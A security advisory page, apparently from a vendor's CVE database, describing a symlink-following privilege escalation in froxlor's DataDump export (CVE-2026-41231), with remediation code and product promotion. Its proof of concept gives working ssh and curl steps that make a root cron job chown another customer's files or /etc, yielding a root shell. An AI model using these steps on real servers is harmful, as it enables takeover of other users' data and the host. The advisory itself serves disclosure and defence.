CVE-2026-41231

CVE-2026-41231 is a high-severity security vulnerability in froxlor/froxlor (composer), affecting versions < 2.3.6. It is fixed in 2.3.6.

Summary

DataDump.add() constructs the export destination path from user-supplied input without passing the $fixed_homedir parameter to FileDir::makeCorrectDir(), bypassing the symlink validation that was added to all other customer-facing path operations (likely as the fix for CVE-2023-6069). When the ExportCron runs as root, it executes chown -R on the resolved symlink target, allowing a customer to take ownership of arbitrary directories on the system.

Details

The vulnerability is an incomplete patch. After CVE-2023-6069, symlink validation was added to FileDir::makeCorrectDir() via a $fixed_homedir parameter. When provided, it walks each path component checking for symlinks that escape the customer's home directory (lines 134-157 of lib/Froxlor/FileDir.php).

Every customer-facing API command that builds a path from user input passes this parameter:

// DirProtections.php:87
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);

// DirOptions.php:96
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);

// Ftps.php:178
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);

// SubDomains.php:585
return FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);

But DataDump.add() was missed:

// DataDump.php:88, NO $fixed_homedir parameter
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path);

The path flows unvalidated into a cron task (lib/Froxlor/Api/Commands/DataDump.php:133):

Cronjob::inserttask(TaskId::CREATE_CUSTOMER_DATADUMP, $task_data);

When ExportCron::handle() runs as root, it executes at lib/Froxlor/Cron/System/ExportCron.php:232:

FileDir::safe_exec('chown -R ' . (int)$data['uid'] . ':' . (int)$data['gid'] . ' ' . escapeshellarg($data['destdir']));

The chown -R command follows symlinks in its target argument. If $data['destdir'] resolves through a symlink to an arbitrary directory, the attacker's UID/GID is applied recursively to that directory and all its contents.

The Validate::validate() call on line 86 uses an empty pattern, which falls back to /^[^\r\n\t\f\0]*$/D, this only strips control characters and does not prevent symlink names. makeSecurePath() strips shell metacharacters and .. traversal but does not check for symlinks.

PoC

Prerequisites:

  • system.exportenabled = 1 (admin setting)
  • Customer account with API key and FTP/SSH access
# Step 1: Create a symlink inside the customer's docroot pointing to a victim directory
# (customer has FTP/SSH access to their own docroot)
ssh customer@server 'ln -s /var/customers/webs/victim_customer /var/customers/webs/attacker_customer/steal'

# Step 2: Schedule data export via API with path pointing to the symlink
curl -X POST \
  -H "Content-Type: application/json" \
  -d '{"header":{"apikey":"CUSTOMER_API_KEY","secret":"CUSTOMER_API_SECRET"},"body":{"command":"DataDump.add","params":{"path":"steal","dump_web":"1"}}}' \
  https://panel.example.com/api.php

# Expected response: 200 OK with task_data including destdir

# Step 3: Wait for ExportCron to run (hourly cron as root)
# The cron executes:
#   mkdir -p '/var/customers/webs/attacker_customer/steal/'       (follows symlink, dir exists)
#   tar cfz ... -C /var/customers/webs/attacker_customer/ .       (tars attacker's web data)
#   chown -R <attacker_uid>:<attacker_gid> '/var/customers/webs/attacker_customer/steal/.tmp/'
#   mv export.tar.gz '/var/customers/webs/attacker_customer/steal/'
#   chown -R <attacker_uid>:<attacker_gid> '/var/customers/webs/attacker_customer/steal/'
#
# The final chown resolves the symlink and recursively chowns
# /var/customers/webs/victim_customer/ to the attacker's UID/GID.

# Step 4: Attacker now owns all of victim's web files
ssh customer@server 'ls -la /var/customers/webs/victim_customer/'
# All files now owned by attacker_customer UID

# For system-level escalation, the symlink can target /etc:
# ln -s /etc /var/customers/webs/attacker_customer/steal
# After cron: attacker owns /etc/passwd, /etc/shadow → root shell

Impact

  • Horizontal privilege escalation: A customer can take ownership of any other customer's web files, databases exports, and email data on the same server.
  • Vertical privilege escalation: By targeting system directories (e.g., /etc), the customer can gain read/write access to /etc/passwd and /etc/shadow, enabling creation of a root account or password modification.
  • Data breach: Full read access to all files in the targeted directory tree, including configuration files with database credentials, application secrets, and user data.
  • Service disruption: Changing ownership of system directories can break system services.

The attack requires only a single API call and a symlink. The impact is delayed until the next cron run (typically hourly), making it harder to attribute.

CVE-2026-41231 has a CVSS score of 7.5 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.3.6); upgrading removes the vulnerable code path.

Affected versions

froxlor/froxlor (< 2.3.6)

Security releases

froxlor/froxlor → 2.3.6 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Pass $customer['documentroot'] as the $fixed_homedir parameter in DataDump.add(), consistent with every other API command:

// lib/Froxlor/Api/Commands/DataDump.php, line 88
// Before (vulnerable):
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path);

// After (fixed):
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);

Additionally, the ExportCron should use chown -h (no-dereference) or validate the destination path is not a symlink before executing chown -R:

// lib/Froxlor/Cron/System/ExportCron.php, line 232
// Add symlink check before chown
if (is_link(rtrim($data['destdir'], '/'))) {
    $cronlog->logAction(FroxlorLogger::CRON_ACTION, LOG_ERR, 'Export destination is a symlink, skipping chown for security: ' . $data['destdir']);
} else {
    FileDir::safe_exec('chown -R ' . (int)$data['uid'] . ':' . (int)$data['gid'] . ' ' . escapeshellarg($data['destdir']));
}

Frequently Asked Questions

  1. What is CVE-2026-41231? CVE-2026-41231 is a high-severity security vulnerability in froxlor/froxlor (composer), affecting versions < 2.3.6. It is fixed in 2.3.6.
  2. How severe is CVE-2026-41231? CVE-2026-41231 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of froxlor/froxlor are affected by CVE-2026-41231? froxlor/froxlor (composer) versions < 2.3.6 is affected.
  4. Is there a fix for CVE-2026-41231? Yes. CVE-2026-41231 is fixed in 2.3.6. Upgrade to this version or later.
  5. Is CVE-2026-41231 exploitable, and should I be worried? Whether CVE-2026-41231 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-41231 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-41231? Upgrade froxlor/froxlor to 2.3.6 or later.

Other vulnerabilities in froxlor/froxlor

CVE-2026-52793CVE-2026-41234CVE-2026-41237CVE-2026-41236CVE-2026-41235

Stop the waste.
Protect your environment with Kodem.